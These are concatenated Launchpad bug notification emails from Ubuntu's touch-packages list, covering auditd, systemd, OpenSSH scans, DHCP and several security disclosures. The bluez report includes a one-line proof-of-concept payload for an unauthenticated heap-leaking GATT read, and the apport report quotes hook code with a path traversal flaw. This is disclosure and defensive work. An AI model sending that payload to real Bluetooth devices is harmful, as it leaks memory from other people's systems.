recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242},
{error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK,
seq=4, pid=0},
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=},
[12]) = 76
write(2, "Error setting audit daemon pid ("..., 50Error setting audit daemon
pid (Permission denied)) = 50
write(2, "\n", 1
) = 1
I don't understand why it's issuing an AUDIT_SET command after it
already decided to exit -- maybe it's just trying to tear itself down
cleanly.
I found a few cases in the kernel code for returning both file exists and
permission denied:
kernel/audit.c audit_netlink_ok():
/* Only support auditd and auditctl in initial pid namespace
* for now. */
if (task_active_pid_ns(current) != &init_pid_ns)
return -EPERM;
if (!netlink_capable(skb, CAP_AUDIT_CONTROL))
err = -EPERM;
break;
kernel/audit.c audit_receive_msg():
auditd_pid = auditd_pid_vnr();
if (auditd_pid) {
/* replacing a healthy auditd is not allowed */
if (new_pid) {
audit_log_config_change("audit_pid",
new_pid, auditd_pid, 0);
return -EEXIST;
}
kernel/audit.c audit_set_feature():
/* are we changing a locked feature? */
if (old_lock && (new_feature != old_feature)) {
audit_log_feature_change(i, old_feature, new_feature,
old_lock, new_lock, 0);
return -EPERM;
}
Do any of these feel applicable to your environment?
Thanks
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to audit in Ubuntu.
https://bugs.launchpad.net/bugs/1873627
Title:
auditd fails after moving /var it a new filesystem and turning
/var/run into a symlink to /run
Status in audit package in Ubuntu:
Confirmed
Bug description:
Auditd was working on my system (Ubuntu 18.04LTS, kernel
4.15.0-1065-aws) until recently. But after splitting off /var into a
new filesystem it fails to launch.
running '/sbin/auditd -f' as root indicates a problem writing the pid file
(no file exists even when it says one does) Post config load command output:
Started dispatch
Re: [Touch-packages] [apparmor] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese
On Tue, May 18, 2021 at 07:39:48PM -, Gunnar Hjalmarsson wrote: > On 2021-05-16 22:23, Gunnar Hjalmarsson wrote: > > As regards apparmor it's possible that no change is needed. > > Well, I simply tested with the Chromium snap. fcitx5 does not work in > Chromium, while fcitx4 does. So something needs to be done. Excellent, can you paste the DENIED lines from your test into the bug report? Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1928360 Title: Switch to Fcitx 5 for Chinese Status in Lubuntu default settings: New Status in Ubuntu Kylin: New Status in apparmor package in Ubuntu: New Status in language-selector package in Ubuntu: In Progress Bug description: In Debian 11 Fcitx 5 will be the default IM framework for Chinese on non-GNOME desktops. I can think it's time to make the equivalent changes in Ubuntu 21.10 as well. I'd appreciate input on the topic from the Ubuntu Kylin team as well as other Chinese speaking users. To manage notifications about this bug go to: https://bugs.launchpad.net/lubuntu-default-settings/+bug/1928360/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese
Gunnar, indeed, it had much less in it than I expected; I don't know much about the snap packaging for Chromium, but it looked to me like it was trying to do bluetooth things and that's all that was denied. I'm no fcitx expert but I didn't think it looked related. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1928360 Title: Switch to Fcitx 5 for Chinese Status in Lubuntu default settings: New Status in Ubuntu Kylin: In Progress Status in apparmor package in Ubuntu: New Status in language-selector package in Ubuntu: Fix Released Bug description: In Debian 11 Fcitx 5 will be the default IM framework for Chinese on non-GNOME desktops. I can think it's time to make the equivalent changes in Ubuntu 21.10 as well. I'd appreciate input on the topic from the Ubuntu Kylin team as well as other Chinese speaking users. To manage notifications about this bug go to: https://bugs.launchpad.net/lubuntu-default-settings/+bug/1928360/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1152187] Re: [MIR] systemd
The usual way we determine if a package is in main or not is to check the package lists; will the promotion step make the systemd-container binary package visible to package lists or rmadison output? Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1152187 Title: [MIR] systemd Status in systemd package in Ubuntu: Fix Released Status in systemd source package in Bionic: Incomplete Bug description: * The package is in universe and built on all archs: https://launchpad.net/ubuntu/+source/systemd/44-10ubuntu1 * Rationale: - in a first step we want systemd-services promoted to replace ubuntu- system-services - We will also want to move from consolekit to logind soon (https://blueprints.launchpad.net/ubuntu/+spec/foundations-1303 -consolekit-logind-migration) - udev has been merged in the systemd source upstream so we will want to build it from there at some point as well we don't plan to use the systemd init system at this point * Security: there has been some security issues in the past http://secunia.com/advisories/search/?search=systemd http://secunia.com/advisories/48220/ http://secunia.com/advisories/48208/ http://secunia.com/advisories/48331/ Those are mostly logind issue and have been fixed upstream. Our current package is outdated but we do plan to update it before starting using logind. There should be no issue with the services * Quality: - there is no RC bug in debian: http://bugs.debian.org/cgi-bin/pkgreport.cgi?repeatmerged=no&src=systemd - there is no bug open in launchpad: https://launchpad.net/ubuntu/+source/systemd/+bugs - upstream is active and responsive to issues The desktop bugs team is subscribed to the package in launchpad, foundations/desktop will maintain the package and look to the bug reports regularly. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1152187/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1929758] Re: OpenSSH vulnerabilities
Great, thanks Ian. ** Package changed: ubuntu => openssh (Ubuntu) ** Changed in: openssh (Ubuntu) Status: Incomplete => Invalid ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1929758 Title: OpenSSH vulnerabilities Status in openssh package in Ubuntu: Invalid Bug description: Hi, I was using NMAP to scan my Ubuntu server and it listed some vulnerabilities in OpenSSH. It also came up with exploits against these vulnerabilities. On my home network, I have several computers that I use for various purposes; a Ubuntu 20.04 LTS computer and Kali Linux computer being the subject for this email. I wanted to test if I had any security issues on my Ubuntu computer so I was doing some scans on it from my Kali computer. I did a scan with NMAP and it produced some vulnerabilities in OpenSSH and what exploits to use. Here is some info on my computers and the NMAP command that I used: ~$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.2 LTS Release: 20.04 Codename: focal ─$ lsb_release -a No LSB modules are available. Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2021.1 Codename: kali-rolling ~$ ssh -V OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f 31 Mar 2020 ~$ apt-cache policy ssh ssh: Installed: (none) Candidate: 1:8.2p1-4ubuntu0.2 Version table: 1:8.2p1-4ubuntu0.2 500 500 http://ca.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages 500 http://ca.archive.ubuntu.com/ubuntu focal-security/main amd64 Packages 1:8.2p1-4 500 500 http://ca.archive.ubuntu.com/ubuntu focal/main amd64 Packages ─$ sudo nmap -sV --script vuln 192.168.0.10 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:26 PDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 192.168.0.10 Host is up (0.00017s latency). Not shown: 995 filtered ports PORTSTATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp closed ftp 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.2p1: | EDB-ID:2101810.0 https://vulners.com/exploitdb/EDB-ID:21018 *EXPLOIT* | CVE-2001-0554 10.0https://vulners.com/cve/CVE-2001-0554 | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062 | CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041 | MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT* | MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT* | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 |_MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/0.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/ *EXPLOIT* 80/tcp open http Apache httpd |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Apache |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 443/tcp open ssl/http Apache httpd |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Apache |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_sslv2-drown: MAC Address: 00:15:C5:F6:5D:94 (Dell) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 80.86 seconds Thanks, Ian To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1929758/+subscriptions -- Mai
[Touch-packages] [Bug 1930103] Re: isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update
Hello Milan, I just tested an upgrade: Unpacking isc-dhcp-server (4.4.1-2.1ubuntu5.20.04.2) over (4.4.1-2.1ubuntu5) ... and my /etc/default/isc-dhcp-server modifications had been left in place. The maintainer scripts will create a new one if the file cannot be read: https://sources.debian.org/src/isc-dhcp/4.4.1-2.2/debian/isc-dhcp-server.postinst/#L33 (Debian sources, but Ubuntu's are very similar.) Is it possible your old /etc/default/isc-dhcp-server could not be read? Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu. https://bugs.launchpad.net/bugs/1930103 Title: isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update Status in isc-dhcp package in Ubuntu: New Bug description: Today unattended upgrade of ISC DHCPD overwrite config file /etc/default/isc-dhcp-server and set wrong interface where daemon have to listen (eno2 instead of br0 as was set before update). I see no backup file of original config file so I had to investigate where the problem was. Update have to never overwrite config file and throw away previous version. /var/log/apt/history.log: Start-Date: 2021-05-28 06:17:41 Commandline: /usr/bin/unattended-upgrade Upgrade: isc-dhcp-server:amd64 (4.4.1-2.1ubuntu5, 4.4.1-2.1ubuntu5.20.04.2) End-Date: 2021-05-28 06:17:47 root@linux:~# ls -l /etc/default/isc-dhcp-server -rw-r--r-- 1 root root 629 May 28 06:17 /etc/default/isc-dhcp-server To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1930103/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1930209] Re: Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links)
** Summary changed: - sudo apt install timeshift Reading package lists... Done Building dependency treeReading state information... Done The following NEW packages will be installed: timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. After this operation, 3,323 kB of additional disk space will be used. Get:1 http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) Selecting previously unselected package timeshift. (Reading database ... 191451 files and directories currently installed.) Preparing to unpack .../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common (3.192.30.7) ... ttf-mscorefonts-installer: processing... ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/andale32.exe /usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes real_sha256 = apt_pkg.sha256sum(dest_file_obj) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/arial32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/arialb32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/comic32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/courie32.exe ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/georgi32.exe Get:1 http://downloads.sourceforge.net/corefonts/georgi32.exe [392 kB] Fetched 392 kB in 8s (46.6 kB/s) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/impact32.exe Get:1 http://downloads.sourceforge.net/corefonts/impact32.exe [173 kB] Fetched 173 kB in 20s (8,707 B/s) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/times32.exe Get:1 http://downloads.sourceforge.net/corefonts/times32.exe [662 kB] Fetched 662 kB in 35s (19.1 kB/s) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/trebuc32.exe Get:1 http://downloads.sourceforge.net/corefonts/trebuc32.exe [357 kB] Fetched 357 kB in 21s (16.8 kB/s) ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/verdan32.exe Err:1 http://downloads.sourceforge.net/corefonts/verdan32.exe Could not open file /var/lib/update-notifier/package-data-downloads/partial/ve rdan32.exe - open (40: Too many levels of symbolic links) [IP: 203.135.147.10 44 3] E: Failed to fetch https://udomain.dl.sourceforge.net/project/corefonts/the font s/final/verdan32.exe Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links) [I P: 203.135.147.10 443] E: Download Failed Processing triggers for desktop-file-utils (0.24-1ubuntu3) ... Processing triggers for mime-support (3.64ubuntu1) ... Processing triggers for hicolor-icon-theme (0.17-2) ... Processing triggers for gnome-menus (3.36.0-1ubuntu1) ... Processing triggers for man-db (2.9.1-1) ... + Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links) ** Description changed: app installation is not properly fixed files arenot properly installed and it gives alot of error + + === from title === + sudo apt install timeshift Reading package lists... Done Building dependency treeReading state information... Done The following NEW packages will be installed: timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. After this operation, 3,323 kB of additional disk space will be used. Get:1 http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) Selecting previously unselected package timeshift. (Reading database ... 191451 files and directories currently installed.) Preparing to unpack .../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common (3.192.30.7) ... ttf-mscorefonts-installer: processing... ttf-mscorefonts-installer: downloading http://downloads.sourceforge.net/corefont s/andale32.exe /usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes real_sha256 = apt_pkg.sha256sum(dest_file_obj) ttf-mscorefonts-installer:
[Touch-packages] [Bug 1930301] Re: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1
** Also affects: debconf (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pam in Ubuntu. https://bugs.launchpad.net/bugs/1930301 Title: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 Status in debconf package in Ubuntu: New Status in pam package in Ubuntu: New Bug description: My laptop system continuously pops the message system crashed ProblemType: Package DistroRelease: Ubuntu 20.04 Package: libpam0g:amd64 1.3.1-5ubuntu4.2 ProcVersionSignature: Ubuntu 5.8.0-53.60~20.04.1-generic 5.8.18 Uname: Linux 5.8.0-53-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.18 Architecture: amd64 CasperMD5CheckResult: skip Date: Mon May 31 22:05:36 2021 DuplicateSignature: package:libpam0g:amd64:1.3.1-5ubuntu4.2 Setting up libpam0g:amd64 (1.3.1-5ubuntu4.2) ... debconf: DbDriver "config": /var/cache/debconf/config.dat is locked by another process: Resource temporarily unavailable dpkg: error processing package libpam0g:amd64 (--configure): installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 ErrorMessage: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 InstallationDate: Installed on 2020-08-08 (296 days ago) InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731) Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4 RelatedPackageVersions: dpkg 1.19.7ubuntu3 apt 2.0.4 SourcePackage: pam Title: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1930301/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1930286] Re: Defensics' synopsys fuzzer testing tool cause openssh to segfault
Hello Eric, thanks for doing the research on this issue. Does the coredump look like this may be exploitable in some fashion? Is the crash something that affects anything beyond the specific process serving the client in question? Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1930286 Title: Defensics' synopsys fuzzer testing tool cause openssh to segfault Status in openssh package in Ubuntu: New Status in openssh source package in Xenial: New Bug description: Here's what has been brought to my attention by a UA customer: * Release: Xenial/16.04LTS * Openssh version: 7.2p2-4ubuntu2.10 * Fuzzer tool used: https://www.synopsys.com/software-integrity/security-testing/fuzz-testing.html (proprietary software) As of today, I have no access to a reproducer. Still working on getting access to one (if possible) in order to better understand what the failing test scenario is doing. * coredump: $ gdb $(which sshd) core.cic-1.domain.tld.1612566260.sshd.20731 ... Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Core was generated by `sshd: [net] '. Program terminated with signal SIGSEGV, Segmentation fault. #0 __memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136 136 ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S: No such file or directory. (gdb) bt #0 __memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136 #1 0x7fec25b241db in memcpy (__len=, __src=0x0, __dest=) at /usr/include/x86_64-linux-gnu/bits/string3.h:53 #2 aes_gcm_ctrl (c=0x558a7ae19758, type=, arg=, ptr=0x0) at e_aes.c:1189 #3 0x7fec25b20897 in EVP_CIPHER_CTX_ctrl (ctx=ctx@entry=0x558a7ae19758, type=type@entry=18, arg=arg@entry=-1, ptr=ptr@entry=0x0) at evp_enc.c:619 #4 0x558a7953f54c in cipher_init (cc=cc@entry=0x558a7ae19750, cipher=0x558a797b3ef0 , key=0x0, keylen=32, iv=0x0, ivlen=, do_encrypt=0) at ../cipher.c:336 #5 0x558a7954521a in ssh_set_newkeys (ssh=ssh@entry=0x558a7ae18ef0, mode=mode@entry=0)at ../packet.c:919 #6 0x558a7955ae92 in kex_input_newkeys (type=, seq=, ctxt=0x558a7ae18ef0)at ../kex.c:434 #7 0x558a7954d269 in ssh_dispatch_run (ssh=ssh@entry=0x558a7ae18ef0, mode=0, done=0x558a7ae18278, ctxt=0x558a7ae18ef0) at ../dispatch.c:119 #8 0x558a7954d2b9 in ssh_dispatch_run_fatal (ssh=0x558a7ae18ef0, mode=, done=, ctxt=) at ../dispatch.c:140 #9 0x558a79502770 in do_ssh2_kex () at ../sshd.c:2744 #10 main (ac=, av=) at ../sshd.c:2301 (gdb) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1930286/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548
Title:
The gatt protocol has out-of-bounds read that leads to information
leakage
Status in bluez package in Ubuntu:
New
Bug description:
I installed the latest bluez 5.53-0ubuntu3 version using apt-get install. It
seems that this vulnerability was silently fixed in the latest bluez5.8, and
the cve number was not assigned.
But this vulnerability now affects the latest ubuntu system
This vulnerability allows an attacker to remotely obtain most of the contents
of the heap without authentication.
The vulnerability code is stored in cli_feat_read_cb, this function does not
verify the offset parameter
The vulnerability code is as follows
gatt-database.c
1054:static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
unsigned int id, uint16_t offset,
uint8_t opcode, struct bt_att *att,
void *user_data){
...
len = sizeof(state->cli_feat)-offset;
value = len? &state->cli_feat[offset]: NULL;
done:
gatt_db_attribute_read_result(attrib, id, ecode, value, len);
}
len will become very large due to integer overflow, so that a message of mtu
(0x90) size will be sent later
The message content is the buffer pointed to by value, which can be most
addresses on the heap
poc is very simple, the core is this line of code
memcpy(&buf[0],"\x0c\x0b\x00\x0d\x00",5);
0xc stands for read
\x0b\x00 represents the handle of the client feature, which can be obtained
through the find info message, which seems to be 0b by default
\x0d\x00 is offset0xd
this vulnerability is serious
I want to apply for a cve number, although this has been silently fixed in
the latest version
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1926548/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage
Daniel, are you sure about that fixed-in-5.56 bug tag? I can't spot the
referenced commit in the tarballs 5.55, 5.56, 5.57, 5.58 from:
http://www.bluez.org/
nor in the github sources:
https://github.com/bluez/bluez/blob/master/src/gatt-database.c#L1054
nor the kernel.org sources:
https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/src/gatt-database.c#n1054
Thanks
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548
Title:
The gatt protocol has out-of-bounds read that leads to information
leakage
Status in Bluez Utilities:
Fix Released
Status in bluez package in Ubuntu:
Fix Released
Status in bluez source package in Hirsute:
Fix Released
Status in bluez source package in Impish:
Fix Released
Bug description:
I installed the latest bluez 5.53-0ubuntu3 version using apt-get install. It
seems that this vulnerability was silently fixed in the latest bluez5.8, and
the cve number was not assigned.
But this vulnerability now affects the latest ubuntu system
This vulnerability allows an attacker to remotely obtain most of the contents
of the heap without authentication.
The vulnerability code is stored in cli_feat_read_cb, this function does not
verify the offset parameter
The vulnerability code is as follows
gatt-database.c
1054:static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
unsigned int id, uint16_t offset,
uint8_t opcode, struct bt_att *att,
void *user_data){
...
len = sizeof(state->cli_feat)-offset;
value = len? &state->cli_feat[offset]: NULL;
done:
gatt_db_attribute_read_result(attrib, id, ecode, value, len);
}
len will become very large due to integer overflow, so that a message of mtu
(0x90) size will be sent later
The message content is the buffer pointed to by value, which can be most
addresses on the heap
poc is very simple, the core is this line of code
memcpy(&buf[0],"\x0c\x0b\x00\x0d\x00",5);
0xc stands for read
\x0b\x00 represents the handle of the client feature, which can be obtained
through the find info message, which seems to be 0b by default
\x0d\x00 is offset0xd
this vulnerability is serious
I want to apply for a cve number, although this has been silently fixed in
the latest version
To manage notifications about this bug go to:
https://bugs.launchpad.net/bluez/+bug/1926548/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage
Wonderful, thanks Daniel!
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548
Title:
The gatt protocol has out-of-bounds read that leads to information
leakage
Status in Bluez Utilities:
Fix Released
Status in bluez package in Ubuntu:
Fix Released
Status in bluez source package in Hirsute:
Fix Released
Status in bluez source package in Impish:
Fix Released
Bug description:
I installed the latest bluez 5.53-0ubuntu3 version using apt-get install. It
seems that this vulnerability was silently fixed in the latest bluez5.8, and
the cve number was not assigned.
But this vulnerability now affects the latest ubuntu system
This vulnerability allows an attacker to remotely obtain most of the contents
of the heap without authentication.
The vulnerability code is stored in cli_feat_read_cb, this function does not
verify the offset parameter
The vulnerability code is as follows
gatt-database.c
1054:static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
unsigned int id, uint16_t offset,
uint8_t opcode, struct bt_att *att,
void *user_data){
...
len = sizeof(state->cli_feat)-offset;
value = len? &state->cli_feat[offset]: NULL;
done:
gatt_db_attribute_read_result(attrib, id, ecode, value, len);
}
len will become very large due to integer overflow, so that a message of mtu
(0x90) size will be sent later
The message content is the buffer pointed to by value, which can be most
addresses on the heap
poc is very simple, the core is this line of code
memcpy(&buf[0],"\x0c\x0b\x00\x0d\x00",5);
0xc stands for read
\x0b\x00 represents the handle of the client feature, which can be obtained
through the find info message, which seems to be 0b by default
\x0d\x00 is offset0xd
this vulnerability is serious
I want to apply for a cve number, although this has been silently fixed in
the latest version
To manage notifications about this bug go to:
https://bugs.launchpad.net/bluez/+bug/1926548/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1917904] Re: Arbitrary file reads
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1917904
Title:
Arbitrary file reads
Status in apport package in Ubuntu:
Fix Released
Status in apport source package in Bionic:
Fix Released
Status in openjdk-lts source package in Bionic:
New
Status in apport source package in Focal:
Fix Released
Status in openjdk-lts source package in Focal:
New
Status in apport source package in Groovy:
Fix Released
Status in openjdk-lts source package in Groovy:
New
Status in apport source package in Hirsute:
Fix Released
Status in openjdk-lts source package in Hirsute:
New
Status in apport source package in Impish:
Fix Released
Status in openjdk-lts source package in Impish:
New
Bug description:
# Vulnerabilities in Apport
During a cursory code review, several potential security issues in `apport`
and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have
been identified.
While the issue regarding the `openjdk-14-lts` package is exploitable
on default installations, the remaining issues most likely are mitigated by
the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.
With regard to issues mitigated by `fs.protected_symlinks`, it is not
clear if they are considered to be part of the threat model, but
nonetheless will be included in this report. Further, if the issues
regarding package hooks should be reported in the corresponding
packages' bug tracker, please let me know.
## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
The `add_info()` function allows for a directory traversal by building a file
path using user-controlled data without properly sanitizing the resulting path.
```Python
def add_info(report, ui=None):
if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
# attach hs_err_.pid file
cwd = report['ProcCwd']
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
if pid_line:
pid = pid_line.groups()[0]
path = "%s/hs_err_pid%s.log" % (cwd, pid)
# make sure if exists
if os.path.exists(path):
content = read_file(path)
# truncate if bigger than 100 KB
# see LP: #1696814
max_length = 100*1024
if sys.getsizeof(content) < max_length:
report['HotspotError'] = content
report['Tags'] += ' openjdk-hs-err'
else:
report['HotspotError'] = content[:max_length] + \
"\n[truncated by openjdk-11 apport hook]" + \
"\n[max log size is %s, file size was %s]" % \
